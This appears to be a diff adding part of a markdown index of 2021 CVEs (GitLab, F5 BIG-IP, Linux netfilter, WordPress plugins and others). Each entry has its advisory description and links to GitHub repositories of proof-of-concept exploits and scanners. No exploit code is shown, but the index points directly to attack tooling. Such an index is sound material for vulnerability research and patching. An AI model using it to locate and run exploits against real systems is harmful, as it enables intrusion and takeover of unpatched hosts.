+The vCenter Server contains multiple local privilege escalation vulnerabilities due to improper permissions of files and directories. An authenticated local user with non-administrative privilege may exploit these issues to elevate their privileges to root on vCenter Server Appliance.
+
+
+- [PenteraIO/vScalation-CVE-2021-22015](https://github.com/PenteraIO/vScalation-CVE-2021-22015)
+
+### CVE-2021-22053 (2021-11-19)
+
+Applications using both `spring-cloud-netflix-hystrix-dashboard` and `spring-boot-starter-thymeleaf` expose a way to execute code submitted within the request URI path during the resolution of view templates. When a request is made at `/hystrix/monitor;[user-provided data]`, the path elements following `hystrix/monitor` are being evaluated as SpringEL expressions, which can lead to code execution.
+
+
+- [SecCoder-Security-Lab/spring-cloud-netflix-hystrix-dashboard-cve-2021-22053](https://github.com/SecCoder-Security-Lab/spring-cloud-netflix-hystrix-dashboard-cve-2021-22053)
+- [Vulnmachines/CVE-2021-22053](https://github.com/Vulnmachines/CVE-2021-22053)
+
+### CVE-2021-22054 (2021-12-17)
+
+VMware Workspace ONE UEM console 20.0.8 prior to 20.0.8.37, 20.11.0 prior to 20.11.0.40, 21.2.0 prior to 21.2.0.27, and 21.5.0 prior to 21.5.0.37 contain an SSRF vulnerability. This issue may allow a malicious actor with network access to UEM to send their requests without authentication and to gain access to sensitive information.
+
+
+- [MKSx/CVE-2021-22054](https://github.com/MKSx/CVE-2021-22054)
+
+### CVE-2021-22119 (2021-06-29)
+
+Spring Security versions 5.5.x prior to 5.5.1, 5.4.x prior to 5.4.7, 5.3.x prior to 5.3.10 and 5.2.x prior to 5.2.11 are susceptible to a Denial-of-Service (DoS) attack via the initiation of the Authorization Request in an OAuth 2.0 Client Web and WebFlux application. A malicious user or attacker can send multiple requests initiating the Authorization Request for the Authorization Code Grant, which has the potential of exhausting system resources using a single session or multiple sessions.
+
+
+- [mari6274/oauth-client-exploit](https://github.com/mari6274/oauth-client-exploit)
+
+### CVE-2021-22123 (2021-06-01)
+
+An OS command injection vulnerability in FortiWeb's management interface 6.3.7 and below, 6.2.3 and below, 6.1.x, 6.0.x, 5.9.x may allow a remote authenticated attacker to execute arbitrary commands on the system via the SAML server configuration page.
+
+
+- [murataydemir/CVE-2021-22123](https://github.com/murataydemir/CVE-2021-22123)
+
+### CVE-2021-22145 (2021-07-21)
+
+A memory disclosure vulnerability was identified in Elasticsearch 7.10.0 to 7.13.3 error reporting. A user with the ability to submit arbitrary queries to Elasticsearch could submit a malformed query that would result in an error message returned containing previously used portions of a data buffer. This buffer could contain sensitive information such as Elasticsearch documents or authentication details.
+
+
+- [niceeeeeeee/CVE-2021-22145-poc](https://github.com/niceeeeeeee/CVE-2021-22145-poc)
+
+### CVE-2021-22146 (2021-07-21)
+
+All versions of Elastic Cloud Enterprise has the Elasticsearch “anonymous” user enabled by default in deployed clusters. While in the default setting the anonymous user has no permissions and is unable to successfully query any Elasticsearch APIs, an attacker could leverage the anonymous user to gain insight into certain details of a deployed cluster.
+
+
+- [magichk/cve-2021-22146](https://github.com/magichk/cve-2021-22146)
+
+### CVE-2021-22192 (2021-03-24)
+
+An issue has been discovered in GitLab CE/EE affecting all versions starting from 13.2 allowing unauthorized authenticated users to execute arbitrary code on the server.
+
+
+- [EXP-Docs/CVE-2021-22192](https://github.com/EXP-Docs/CVE-2021-22192)
+- [PetrusViet/Gitlab-RCE](https://github.com/PetrusViet/Gitlab-RCE)
+
+### CVE-2021-22201 (2021-04-02)
+
+An issue has been discovered in GitLab CE/EE affecting all versions starting from 13.9. A specially crafted import file could read files on the server.
+
+
+- [exp1orer/CVE-2021-22201](https://github.com/exp1orer/CVE-2021-22201)
+
+### CVE-2021-22204 (2021-04-23)
+
+Improper neutralization of user data in the DjVu file format in ExifTool versions 7.44 and up allows arbitrary code execution when parsing the malicious image
+
+
+- [convisolabs/CVE-2021-22204-exiftool](https://github.com/convisolabs/CVE-2021-22204-exiftool)
+- [se162xg/CVE-2021-22204](https://github.com/se162xg/CVE-2021-22204)
+- [bilkoh/POC-CVE-2021-22204](https://github.com/bilkoh/POC-CVE-2021-22204)
+- [PenTestical/CVE-2021-22204](https://github.com/PenTestical/CVE-2021-22204)
+- [AssassinUKG/CVE-2021-22204](https://github.com/AssassinUKG/CVE-2021-22204)
+- [ph-arm/CVE-2021-22204-Gitlab](https://github.com/ph-arm/CVE-2021-22204-Gitlab)
+- [Asaad27/CVE-2021-22204-RSE](https://github.com/Asaad27/CVE-2021-22204-RSE)
+- [trganda/CVE-2021-22204](https://github.com/trganda/CVE-2021-22204)
+- [0xBruno/CVE-2021-22204](https://github.com/0xBruno/CVE-2021-22204)
+- [mr-tuhin/CVE-2021-22204-exiftool](https://github.com/mr-tuhin/CVE-2021-22204-exiftool)
+- [UNICORDev/exploit-CVE-2021-22204](https://github.com/UNICORDev/exploit-CVE-2021-22204)
+- [Akash7350/CVE-2021-22204](https://github.com/Akash7350/CVE-2021-22204)
+- [battleofthebots/dejavu](https://github.com/battleofthebots/dejavu)
+- [cc3305/CVE-2021-22204](https://github.com/cc3305/CVE-2021-22204)
+
+### CVE-2021-22205 (2021-04-23)
+
+An issue has been discovered in GitLab CE/EE affecting all versions starting from 11.9. GitLab was not properly validating image files that were passed to a file parser which resulted in a remote command execution.
+
+
+- [mr-r3bot/Gitlab-CVE-2021-22205](https://github.com/mr-r3bot/Gitlab-CVE-2021-22205)
+- [XTeam-Wing/CVE-2021-22205](https://github.com/XTeam-Wing/CVE-2021-22205)
+- [r0eXpeR/CVE-2021-22205](https://github.com/r0eXpeR/CVE-2021-22205)
+- [antx-code/CVE-2021-22205](https://github.com/antx-code/CVE-2021-22205)
+- [Al1ex/CVE-2021-22205](https://github.com/Al1ex/CVE-2021-22205)
+- [whwlsfb/CVE-2021-22205](https://github.com/whwlsfb/CVE-2021-22205)
+- [findneo/GitLab-preauth-RCE_CVE-2021-22205](https://github.com/findneo/GitLab-preauth-RCE_CVE-2021-22205)
+- [Seals6/CVE-2021-22205](https://github.com/Seals6/CVE-2021-22205)
+- [c0okB/CVE-2021-22205](https://github.com/c0okB/CVE-2021-22205)
+- [shang159/CVE-2021-22205-getshell](https://github.com/shang159/CVE-2021-22205-getshell)
+- [devdanqtuan/CVE-2021-22205](https://github.com/devdanqtuan/CVE-2021-22205)
+- [hh-hunter/cve-2021-22205](https://github.com/hh-hunter/cve-2021-22205)
+- [runsel/GitLab-CVE-2021-22205-](https://github.com/runsel/GitLab-CVE-2021-22205-)
+- [faisalfs10x/GitLab-CVE-2021-22205-scanner](https://github.com/faisalfs10x/GitLab-CVE-2021-22205-scanner)
+- [inspiringz/CVE-2021-22205](https://github.com/inspiringz/CVE-2021-22205)
+- [pizza-power/Golang-CVE-2021-22205-POC](https://github.com/pizza-power/Golang-CVE-2021-22205-POC)
+- [DIVD-NL/GitLab-cve-2021-22205-nse](https://github.com/DIVD-NL/GitLab-cve-2021-22205-nse)
+- [w0x68y/Gitlab-CVE-2021-22205](https://github.com/w0x68y/Gitlab-CVE-2021-22205)
+- [al4xs/CVE-2021-22205-gitlab](https://github.com/al4xs/CVE-2021-22205-gitlab)
+- [honypot/CVE-2021-22205](https://github.com/honypot/CVE-2021-22205)
+- [momika233/cve-2021-22205-GitLab-13.10.2---Remote-Code-Execution-RCE-Unauthenticated-](https://github.com/momika233/cve-2021-22205-GitLab-13.10.2---Remote-Code-Execution-RCE-Unauthenticated-)
+- [keven1z/CVE-2021-22205](https://github.com/keven1z/CVE-2021-22205)
+- [hhhotdrink/CVE-2021-22205](https://github.com/hhhotdrink/CVE-2021-22205)
+- [sei-fish/CVE-2021-22205](https://github.com/sei-fish/CVE-2021-22205)
+- [overgrowncarrot1/DejaVu-CVE-2021-22205](https://github.com/overgrowncarrot1/DejaVu-CVE-2021-22205)
+- [Hikikan/CVE-2021-22205](https://github.com/Hikikan/CVE-2021-22205)
+- [NukingDragons/gitlab-cve-2021-22205](https://github.com/NukingDragons/gitlab-cve-2021-22205)
+- [cc3305/CVE-2021-22205](https://github.com/cc3305/CVE-2021-22205)
+
+### CVE-2021-22206 (2021-05-06)
+
+An issue has been discovered in GitLab affecting all versions starting from 11.6. Pull mirror credentials are exposed that allows other maintainers to be able to view the credentials in plain-text,
+
+
+- [dannymas/CVE-2021-22206](https://github.com/dannymas/CVE-2021-22206)
+
+### CVE-2021-22214 (2021-06-08)
+
+When requests to the internal network for webhooks are enabled, a server-side request forgery vulnerability in GitLab CE/EE affecting all versions starting from 10.5 was possible to exploit for an unauthenticated attacker even on a GitLab instance where registration is limited
+
+
+- [aaminin/CVE-2021-22214](https://github.com/aaminin/CVE-2021-22214)
+- [Vulnmachines/gitlab-cve-2021-22214](https://github.com/Vulnmachines/gitlab-cve-2021-22214)
+- [antx-code/CVE-2021-22214](https://github.com/antx-code/CVE-2021-22214)
+- [kh4sh3i/GitLab-SSRF-CVE-2021-22214](https://github.com/kh4sh3i/GitLab-SSRF-CVE-2021-22214)
+
+### CVE-2021-22555 (2021-07-04)
+
+A heap out-of-bounds write affecting Linux since v2.6.19-rc1 was discovered in net/netfilter/x_tables.c. This allows an attacker to gain privileges or cause a DoS (via heap memory corruption) through user name space
+
+
+- [JoneyJunior/cve-2021-22555](https://github.com/JoneyJunior/cve-2021-22555)
+- [xyjl-ly/CVE-2021-22555-Exploit](https://github.com/xyjl-ly/CVE-2021-22555-Exploit)
+- [cgwalters/container-cve-2021-22555](https://github.com/cgwalters/container-cve-2021-22555)
+- [daletoniris/CVE-2021-22555-esc-priv](https://github.com/daletoniris/CVE-2021-22555-esc-priv)
+- [veritas501/CVE-2021-22555-PipeVersion](https://github.com/veritas501/CVE-2021-22555-PipeVersion)
+- [masjohncook/netsec-project](https://github.com/masjohncook/netsec-project)
+- [tukru/CVE-2021-22555](https://github.com/tukru/CVE-2021-22555)
+- [pashayogi/CVE-2021-22555](https://github.com/pashayogi/CVE-2021-22555)
+- [letsr00t/-2021-LOCALROOT-CVE-2021-22555](https://github.com/letsr00t/-2021-LOCALROOT-CVE-2021-22555)
+- [letsr00t/CVE-2021-22555](https://github.com/letsr00t/CVE-2021-22555)
+
+### CVE-2021-22569 (2022-01-07)
+
+An issue in protobuf-java allowed the interleaving of com.google.protobuf.UnknownFieldSet fields in such a way that would be processed out of order. A small malicious payload can occupy the parser for several minutes by creating large numbers of short-lived objects that cause frequent, repeated pauses. We recommend upgrading libraries beyond the vulnerable versions.
+
+
+- [Mario-Kart-Felix/A-potential-Denial-of-Service-issue-in-protobuf-java](https://github.com/Mario-Kart-Felix/A-potential-Denial-of-Service-issue-in-protobuf-java)
+
+### CVE-2021-22873 (2021-01-21)
+
+Revive Adserver before 5.1.0 is vulnerable to open redirects via the `dest`, `oadest`, and/or `ct0` parameters of the lg.php and ck.php delivery scripts. Such open redirects had previously been available by design to allow third party ad servers to track such metrics when delivering ads. However, third party click tracking via redirects is not a viable option anymore, leading to such open redirect functionality being removed and reclassified as a vulnerability.
+
+
+- [K3ysTr0K3R/CVE-2021-22873-EXPLOIT](https://github.com/K3ysTr0K3R/CVE-2021-22873-EXPLOIT)
+
+### CVE-2021-22880 (2021-02-11)
+
+The PostgreSQL adapter in Active Record before 6.1.2.1, 6.0.3.5, 5.2.4.5 suffers from a regular expression denial of service (REDoS) vulnerability. Carefully crafted input can cause the input validation in the `money` type of the PostgreSQL adapter in Active Record to spend too much time in a regular expression, resulting in the potential for a DoS attack. This only impacts Rails applications that are using PostgreSQL along with money type columns that take user input.
+
+
+- [halkichi0308/CVE-2021-22880](https://github.com/halkichi0308/CVE-2021-22880)
+
+### CVE-2021-22893 (2021-04-23)
+
+Pulse Connect Secure 9.0R3/9.1R1 and higher is vulnerable to an authentication bypass vulnerability exposed by the Windows File Share Browser and Pulse Secure Collaboration features of Pulse Connect Secure that can allow an unauthenticated user to perform remote arbitrary code execution on the Pulse Connect Secure gateway. This vulnerability has been exploited in the wild.
+
+
+- [ZephrFish/CVE-2021-22893_HoneyPoC2](https://github.com/ZephrFish/CVE-2021-22893_HoneyPoC2)
+- [Mad-robot/CVE-2021-22893](https://github.com/Mad-robot/CVE-2021-22893)
+- [orangmuda/CVE-2021-22893](https://github.com/orangmuda/CVE-2021-22893)
+
+### CVE-2021-22911 (2021-05-27)
+
+A improper input sanitization vulnerability exists in Rocket.Chat server 3.11, 3.12 & 3.13 that could lead to unauthenticated NoSQL injection, resulting potentially in RCE.
+
+
+- [CsEnox/CVE-2021-22911](https://github.com/CsEnox/CVE-2021-22911)
+- [optionalCTF/Rocket.Chat-Automated-Account-Takeover-RCE-CVE-2021-22911](https://github.com/optionalCTF/Rocket.Chat-Automated-Account-Takeover-RCE-CVE-2021-22911)
+- [jayngng/CVE-2021-22911](https://github.com/jayngng/CVE-2021-22911)
+- [ChrisPritchard/CVE-2021-22911-rust](https://github.com/ChrisPritchard/CVE-2021-22911-rust)
+- [MrDottt/CVE-2021-22911](https://github.com/MrDottt/CVE-2021-22911)
+- [overgrowncarrot1/CVE-2021-22911](https://github.com/overgrowncarrot1/CVE-2021-22911)
+
+### CVE-2021-22924 (2021-08-05)
+
+libcurl keeps previously used connections in a connection pool for subsequenttransfers to reuse, if one of them matches the setup.Due to errors in the logic, the config matching function did not take 'issuercert' into account and it compared the involved paths *case insensitively*,which could lead to libcurl reusing wrong connections.File paths are, or can be, case sensitive on many systems but not all, and caneven vary depending on used file systems.The comparison also didn't include the 'issuer cert' which a transfer can setto qualify how to verify the server certificate.
+
+
+- [Trinadh465/external_curl_AOSP10_r33_CVE-2021-22924](https://github.com/Trinadh465/external_curl_AOSP10_r33_CVE-2021-22924)
+
+### CVE-2021-22941 (2021-09-23)
+
+Improper Access Control in Citrix ShareFile storage zones controller before 5.11.20 may allow an unauthenticated attacker to remotely compromise the storage zones controller.
+
+
+- [hoavt184/CVE-2021-22941](https://github.com/hoavt184/CVE-2021-22941)
+
+### CVE-2021-22986 (2021-03-31)
+
+On BIG-IP versions 16.0.x before 16.0.1.1, 15.1.x before 15.1.2.1, 14.1.x before 14.1.4, 13.1.x before 13.1.3.6, and 12.1.x before 12.1.5.3 amd BIG-IQ 7.1.0.x before 7.1.0.3 and 7.0.0.x before 7.0.0.2, the iControl REST interface has an unauthenticated remote command execution vulnerability. Note: Software versions which have reached End of Software Development (EoSD) are not evaluated.
+
+
+- [dorkerdevil/CVE-2021-22986-Poc](https://github.com/dorkerdevil/CVE-2021-22986-Poc)
+- [S1xHcL/f5_rce_poc](https://github.com/S1xHcL/f5_rce_poc)
+- [Osyanina/westone-CVE-2021-22986-scanner](https://github.com/Osyanina/westone-CVE-2021-22986-scanner)
+- [Udyz/CVE-2021-22986-SSRF2RCE](https://github.com/Udyz/CVE-2021-22986-SSRF2RCE)
+- [safesword/F5_RCE](https://github.com/safesword/F5_RCE)
+- [Al1ex/CVE-2021-22986](https://github.com/Al1ex/CVE-2021-22986)
+- [kiri-48/CVE-2021-22986](https://github.com/kiri-48/CVE-2021-22986)
+- [ZephrFish/CVE-2021-22986_Check](https://github.com/ZephrFish/CVE-2021-22986_Check)
+- [yaunsky/CVE-202122986-EXP](https://github.com/yaunsky/CVE-202122986-EXP)
+- [Tas9er/CVE-2021-22986](https://github.com/Tas9er/CVE-2021-22986)
+- [dotslashed/CVE-2021-22986](https://github.com/dotslashed/CVE-2021-22986)
+- [DDestinys/CVE-2021-22986](https://github.com/DDestinys/CVE-2021-22986)
+- [west9b/F5-BIG-IP-POC](https://github.com/west9b/F5-BIG-IP-POC)
+- [amitlttwo/CVE-2021-22986](https://github.com/amitlttwo/CVE-2021-22986)
+- [huydung26/CVE-2021-22986](https://github.com/huydung26/CVE-2021-22986)
+
+### CVE-2021-23017 (2021-06-01)
+
+A security issue in nginx resolver was identified, which might allow an attacker who is able to forge UDP packets from the DNS server to cause 1-byte memory overwrite, resulting in worker process crash or potential other impact.
+
+
+- [niandy/nginx-patch](https://github.com/niandy/nginx-patch)
+- [M507/CVE-2021-23017-PoC](https://github.com/M507/CVE-2021-23017-PoC)
+- [lakshit1212/CVE-2021-23017-PoC](https://github.com/lakshit1212/CVE-2021-23017-PoC)
+- [ShivamDey/CVE-2021-23017](https://github.com/ShivamDey/CVE-2021-23017)
+
+### CVE-2021-23132 (2021-03-02)
+
+An issue was discovered in Joomla! 3.0.0 through 3.9.24. com_media allowed paths that are not intended for image uploads
+
+
+- [HoangKien1020/CVE-2021-23132](https://github.com/HoangKien1020/CVE-2021-23132)
+
+### CVE-2021-23358 (2021-03-29)
+
+The package underscore from 1.13.0-0 and before 1.13.0-2, from 1.3.2 and before 1.12.1 are vulnerable to Arbitrary Code Injection via the template function, particularly when a variable property is passed as an argument as it is not sanitized.
+
+
+- [EkamSinghWalia/Detection-script-for-cve-2021-23358](https://github.com/EkamSinghWalia/Detection-script-for-cve-2021-23358)
+
+### CVE-2021-23383 (2021-05-04)
+
+The package handlebars before 4.7.7 are vulnerable to Prototype Pollution when selecting certain compiling options to compile templates coming from an untrusted source.
+
+
+- [dn9uy3n/Check-CVE-2021-23383](https://github.com/dn9uy3n/Check-CVE-2021-23383)
+
+### CVE-2021-23410
+- [azu/msgpack-CVE-2021-23410-test](https://github.com/azu/msgpack-CVE-2021-23410-test)
+
+### CVE-2021-23758 (2021-12-03)
+
+All versions of package ajaxpro.2 are vulnerable to Deserialization of Untrusted Data due to the possibility of deserialization of arbitrary .NET classes, which can be abused to gain remote code execution.
+
+
+- [numanturle/CVE-2021-23758-POC](https://github.com/numanturle/CVE-2021-23758-POC)
+
+### CVE-2021-23840 (2021-02-16)
+
+Calls to EVP_CipherUpdate, EVP_EncryptUpdate and EVP_DecryptUpdate may overflow the output length argument in some cases where the input length is close to the maximum permissable length for an integer on the platform. In such cases the return value from the function call will be 1 (indicating success), but the output length value will be negative. This could cause applications to behave incorrectly or crash. OpenSSL versions 1.1.1i and below are affected by this issue. Users of these versions should upgrade to OpenSSL 1.1.1j. OpenSSL versions 1.0.2x and below are affected by this issue. However OpenSSL 1.0.2 is out of support and no longer receiving public updates. Premium support customers of OpenSSL 1.0.2 should upgrade to 1.0.2y. Other users should upgrade to 1.1.1j. Fixed in OpenSSL 1.1.1j (Affected 1.1.1-1.1.1i). Fixed in OpenSSL 1.0.2y (Affected 1.0.2-1.0.2x).
+
+
+- [Trinadh465/openssl-1.1.1g_CVE-2021-23840](https://github.com/Trinadh465/openssl-1.1.1g_CVE-2021-23840)
+
+### CVE-2021-23841 (2021-02-16)
+
+The OpenSSL public API function X509_issuer_and_serial_hash() attempts to create a unique hash value based on the issuer and serial number data contained within an X509 certificate. However it fails to correctly handle any errors that may occur while parsing the issuer field (which might occur if the issuer field is maliciously constructed). This may subsequently result in a NULL pointer deref and a crash leading to a potential denial of service attack. The function X509_issuer_and_serial_hash() is never directly called by OpenSSL itself so applications are only vulnerable if they use this function directly and they use it on certificates that may have been obtained from untrusted sources. OpenSSL versions 1.1.1i and below are affected by this issue. Users of these versions should upgrade to OpenSSL 1.1.1j. OpenSSL versions 1.0.2x and below are affected by this issue. However OpenSSL 1.0.2 is out of support and no longer receiving public updates. Premium support customers of OpenSSL 1.0.2 should upgrade to 1.0.2y. Other users should upgrade to 1.1.1j. Fixed in OpenSSL 1.1.1j (Affected 1.1.1-1.1.1i). Fixed in OpenSSL 1.0.2y (Affected 1.0.2-1.0.2x).
+
+
+- [Trinadh465/external_boringssl_openssl_1.1.0g_CVE-2021-23841](https://github.com/Trinadh465/external_boringssl_openssl_1.1.0g_CVE-2021-23841)
+- [Satheesh575555/Openssl_1_1_0_CVE-2021-23841](https://github.com/Satheesh575555/Openssl_1_1_0_CVE-2021-23841)
+
+### CVE-2021-24027 (2021-04-06)
+
+A cache configuration issue prior to WhatsApp for Android v2.21.4.18 and WhatsApp Business for Android v2.21.4.18 may have allowed a third party with access to the device’s external storage to read cached TLS material.
+
+
+- [CENSUS/whatsapp-mitd-mitm](https://github.com/CENSUS/whatsapp-mitd-mitm)
+
+### CVE-2021-24084 (2021-02-25)
+
+Windows Mobile Device Management Information Disclosure Vulnerability
+
+
+- [Jeromeyoung/CVE-2021-24084](https://github.com/Jeromeyoung/CVE-2021-24084)
+- [exploitblizzard/WindowsMDM-LPE-0Day](https://github.com/exploitblizzard/WindowsMDM-LPE-0Day)
+
+### CVE-2021-24085 (2021-02-25)
+
+Microsoft Exchange Server Spoofing Vulnerability
+
+
+- [sourceincite/CVE-2021-24085](https://github.com/sourceincite/CVE-2021-24085)
+
+### CVE-2021-24086 (2021-02-25)
+
+Windows TCP/IP Denial of Service Vulnerability
+
+
+- [0vercl0k/CVE-2021-24086](https://github.com/0vercl0k/CVE-2021-24086)
+- [lisinan988/CVE-2021-24086-exp](https://github.com/lisinan988/CVE-2021-24086-exp)
+
+### CVE-2021-24096 (2021-02-25)
+
+Windows Kernel Elevation of Privilege Vulnerability
+
+
+- [FunPhishing/CVE-2021-24096](https://github.com/FunPhishing/CVE-2021-24096)
+
+### CVE-2021-24098 (2021-02-25)
+
+Windows Console Driver Denial of Service Vulnerability
+
+
+- [waleedassar/CVE-2021-24098](https://github.com/waleedassar/CVE-2021-24098)
+
+### CVE-2021-24145 (2021-03-18)
+
+Arbitrary file upload in the Modern Events Calendar Lite WordPress plugin, versions before 5.16.5, did not properly check the imported file, allowing PHP ones to be uploaded by administrator by using the 'text/csv' content-type in the request.
+
+
+- [dnr6419/CVE-2021-24145](https://github.com/dnr6419/CVE-2021-24145)
+
+### CVE-2021-24155 (2021-04-05)
+
+The WordPress Backup and Migrate Plugin – Backup Guard WordPress plugin before 1.6.0 did not ensure that the imported files are of the SGBP format and extension, allowing high privilege users (admin+) to upload arbitrary files, including PHP ones, leading to RCE.
+
+
+- [0dayNinja/CVE-2021-24155.rb](https://github.com/0dayNinja/CVE-2021-24155.rb)
+
+### CVE-2021-24160 (2021-04-05)
+
+In the Reponsive Menu (free and Pro) WordPress plugins before 4.0.4, subscribers could upload zip archives containing malicious PHP files that would get extracted to the /rmp-menu/ directory. These files could then be accessed via the front end of the site to trigger remote code execution and ultimately allow an attacker to execute commands to further infect a WordPress site.
+
+
+- [hnthuan1998/CVE-2021-24160](https://github.com/hnthuan1998/CVE-2021-24160)
+- [hnthuan1998/Exploit-CVE-2021-24160](https://github.com/hnthuan1998/Exploit-CVE-2021-24160)
+
+### CVE-2021-24307 (2021-05-24)
+
+The All in One SEO – Best WordPress SEO Plugin – Easily Improve Your SEO Rankings before 4.1.0.2 enables authenticated users with "aioseo_tools_settings" privilege (most of the time admin) to execute arbitrary code on the underlying host. Users can restore plugin's configuration by uploading a backup .ini file in the section "Tool > Import/Export". However, the plugin attempts to unserialize values of the .ini file. Moreover, the plugin embeds Monolog library which can be used to craft a gadget chain and thus trigger system command execution.
+
+
+- [darkpills/CVE-2021-24307-all-in-one-seo-pack-admin-rce](https://github.com/darkpills/CVE-2021-24307-all-in-one-seo-pack-admin-rce)
+
+### CVE-2021-24347 (2021-06-14)
+
+The SP Project & Document Manager WordPress plugin before 4.22 allows users to upload files, however, the plugin attempts to prevent php and other similar files that could be executed on the server from being uploaded by checking the file extension. It was discovered that php files could still be uploaded by changing the file extension's case, for example, from "php" to "pHP".
+
+
+- [huydoppa/CVE-2021-24347-](https://github.com/huydoppa/CVE-2021-24347-)
+
+### CVE-2021-24356 (2021-06-14)
+
+In the Simple 301 Redirects by BetterLinks WordPress plugin before 2.0.4, a lack of capability checks and insufficient nonce check on the AJAX action, simple301redirects/admin/activate_plugin, made it possible for authenticated users to activate arbitrary plugins installed on vulnerable sites.
+
+
+- [RandomRobbieBF/CVE-2021-24356](https://github.com/RandomRobbieBF/CVE-2021-24356)
+
+### CVE-2021-24499 (2021-08-09)
+
+The Workreap WordPress theme before 2.2.2 AJAX actions workreap_award_temp_file_uploader and workreap_temp_file_uploader did not perform nonce checks, or validate that the request is from a valid user in any other way. The endpoints allowed for uploading arbitrary files to the uploads/workreap-temp directory. Uploaded files were neither sanitized nor validated, allowing an unauthenticated visitor to upload executable code such as php scripts.
+
+
+- [j4k0m/CVE-2021-24499](https://github.com/j4k0m/CVE-2021-24499)
+- [hh-hunter/cve-2021-24499](https://github.com/hh-hunter/cve-2021-24499)
+- [jytmX/CVE-2021-24499](https://github.com/jytmX/CVE-2021-24499)
+
+### CVE-2021-24507 (2021-08-09)
+
+The Astra Pro Addon WordPress plugin before 3.5.2 did not properly sanitise or escape some of the POST parameters from the astra_pagination_infinite and astra_shop_pagination_infinite AJAX action (available to both unauthenticated and authenticated user) before using them in SQL statement, leading to an SQL Injection issues
+
+
+- [RandomRobbieBF/CVE-2021-24507](https://github.com/RandomRobbieBF/CVE-2021-24507)
+
+### CVE-2021-24545 (2021-10-11)
+
+The WP HTML Author Bio WordPress plugin through 1.2.0 does not sanitise the HTML allowed in the Bio of users, allowing them to use malicious JavaScript code, which will be executed when anyone visit a post in the frontend made by such user. As a result, user with a role as low as author could perform Cross-Site Scripting attacks against users, which could potentially lead to privilege escalation when an admin view the related post/s.
+
+
+- [V35HR4J/CVE-2021-24545](https://github.com/V35HR4J/CVE-2021-24545)
+- [dnr6419/CVE-2021-24545](https://github.com/dnr6419/CVE-2021-24545)
+
+### CVE-2021-24563 (2021-10-11)
+
+The Frontend Uploader WordPress plugin through 1.3.2 does not prevent HTML files from being uploaded via its form, allowing unauthenticated user to upload a malicious HTML file containing JavaScript for example, which will be triggered when someone access the file directly
+
+
+- [V35HR4J/CVE-2021-24563](https://github.com/V35HR4J/CVE-2021-24563)
+
+### CVE-2021-24647 (2021-11-08)
+
+The Registration Forms – User profile, Content Restriction, Spam Protection, Payment Gateways, Invitation Codes WordPress plugin before 3.1.7.6 has a flaw in the social login implementation, allowing unauthenticated attacker to login as any user on the site by only knowing their user ID or username
+
+
+- [RandomRobbieBF/CVE-2021-24647](https://github.com/RandomRobbieBF/CVE-2021-24647)
+
+### CVE-2021-24741 (2021-09-20)
+
+The Support Board WordPress plugin before 3.3.4 does not escape multiple POST parameters (such as status_code, department, user_id, conversation_id, conversation_status_code, and recipient_id) before using them in SQL statements, leading to SQL injections which are exploitable by unauthenticated users.
+
+
+- [itsjeffersonli/CVE-2021-24741](https://github.com/itsjeffersonli/CVE-2021-24741)
+
+### CVE-2021-24750 (2021-12-21)
+
+The WP Visitor Statistics (Real Time Traffic) WordPress plugin before 4.8 does not properly sanitise and escape the refUrl in the refDetails AJAX action, available to any authenticated user, which could allow users with a role as low as subscriber to perform SQL injection attacks
+
+
+- [fimtow/CVE-2021-24750](https://github.com/fimtow/CVE-2021-24750)
+
+### CVE-2021-24807 (2021-11-08)
+
+The Support Board WordPress plugin before 3.3.5 allows Authenticated (Agent+) users to perform Cross-Site Scripting attacks by placing a payload in the notes field, when an administrator or any authenticated user go to the chat the XSS will be automatically executed.
+
+
+- [itsjeffersonli/CVE-2021-24807](https://github.com/itsjeffersonli/CVE-2021-24807)
+
+### CVE-2021-24884 (2021-10-25)
+
+The Formidable Form Builder WordPress plugin before 4.09.05 allows to inject certain HTML Tags like <audio>,<video>,<img>,<a> and<button>.This could allow an unauthenticated, remote attacker to exploit a HTML-injection byinjecting a malicous link. The HTML-injection may trick authenticated users to follow the link. If the Link gets clicked, Javascript code can be executed. The vulnerability is due to insufficient sanitization of the "data-frmverify" tag for links in the web-based entry inspection page of affected systems. A successful exploitation incomibantion with CSRF could allow the attacker to perform arbitrary actions on an affected system with the privileges of the user. These actions include stealing the users account by changing their password or allowing attackers to submit their own code through an authenticated user resulting in Remote Code Execution. If an authenticated user who is able to edit Wordpress PHP Code in any kind, clicks the malicious link, PHP code can be edited.
+
+
+- [S1lkys/CVE-2021-24884](https://github.com/S1lkys/CVE-2021-24884)
+
+### CVE-2021-24917 (2021-12-06)
+
+The WPS Hide Login WordPress plugin before 1.9.1 has a bug which allows to get the secret login page by setting a random referer string and making a request to /wp-admin/options.php as an unauthenticated user.
+
+
+- [dikalasenjadatang/CVE-2021-24917](https://github.com/dikalasenjadatang/CVE-2021-24917)
+- [Cappricio-Securities/CVE-2021-24917](https://github.com/Cappricio-Securities/CVE-2021-24917)
+
+### CVE-2021-25003 (2022-03-14)
+
+The WPCargo Track & Trace WordPress plugin before 6.9.0 contains a file which could allow unauthenticated attackers to write a PHP file anywhere on the web server, leading to RCE
+
+
+- [biulove0x/CVE-2021-25003](https://github.com/biulove0x/CVE-2021-25003)
+
+### CVE-2021-25032 (2022-01-10)
+
+The PublishPress Capabilities WordPress plugin before 2.3.1, PublishPress Capabilities Pro WordPress plugin before 2.3.1 does not have authorisation and CSRF checks when updating the plugin's settings via the init hook, and does not ensure that the options to be updated belong to the plugin. As a result, unauthenticated attackers could update arbitrary blog options, such as the default role and make any new registered user with an administrator role.
+
+
+- [RandomRobbieBF/CVE-2021-25032](https://github.com/RandomRobbieBF/CVE-2021-25032)
+
+### CVE-2021-25076 (2022-01-24)
+
+The WP User Frontend WordPress plugin before 3.5.26 does not validate and escape the status parameter before using it in a SQL statement in the Subscribers dashboard, leading to an SQL injection. Due to the lack of sanitisation and escaping, this could also lead to Reflected Cross-Site Scripting
+
+
+- [0xAbbarhSF/CVE-2021-25076](https://github.com/0xAbbarhSF/CVE-2021-25076)
+
+### CVE-2021-25094 (2022-04-25)
+
+The Tatsu WordPress plugin before 3.3.12 add_custom_font action can be used without prior authentication to upload a rogue zip file which is uncompressed under the WordPress's upload directory. By adding a PHP shell with a filename starting with a dot ".", this can bypass extension control implemented in the plugin. Moreover, there is a race condition in the zip extraction process which makes the shell file live long enough on the filesystem to be callable by an attacker.
+
+
+- [darkpills/CVE-2021-25094-tatsu-preauth-rce](https://github.com/darkpills/CVE-2021-25094-tatsu-preauth-rce)
+- [TUANB4DUT/typehub-exploiter](https://github.com/TUANB4DUT/typehub-exploiter)
+- [xdx57/CVE-2021-25094](https://github.com/xdx57/CVE-2021-25094)
